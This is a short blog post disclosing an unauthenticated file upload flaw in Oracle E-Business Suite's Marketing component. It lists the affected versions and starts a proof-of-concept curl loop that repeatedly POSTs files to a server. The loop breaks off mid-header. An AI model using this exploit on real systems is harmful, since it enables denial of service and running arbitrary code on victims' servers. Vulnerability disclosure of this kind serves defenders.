*Introduction* *Oracle E*–*Business Suite* is a fully integrated, comprehensive suite of business applications for the enterprise. Following purposes most of organization uses Oracle E-business. 1. Customer Relationship Management 2. Financial Management 3. Human Capital Management 4. Project Portfolio Management 5. Advanced Procurement 6. Supply Chain Management 7. Service Management *Vulnerable Version* Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4 *Brief About bug * The unauthenticated upload vulnerability resides in Oracle Marketing component. If you search in Google for Oracle E-business, you will find more than 30K unique search results. The file is uploaded into a table in the E-Business Suite database schema. The attacker,however, can use it to fill up the existing table space. Upload functionality allows the attacker to upload any arbitrary file types(All executables) and also allows to execute the uploaded code. *POC Raw code for feeding files files to server to :* for ($x=1; $x < 100; $x++): curl -i -s -k -X 'POST' \ -H 'Origin: http://Oracle-Application:Port' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36' -H 'Content-Type: multipart/form-data; boundary
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment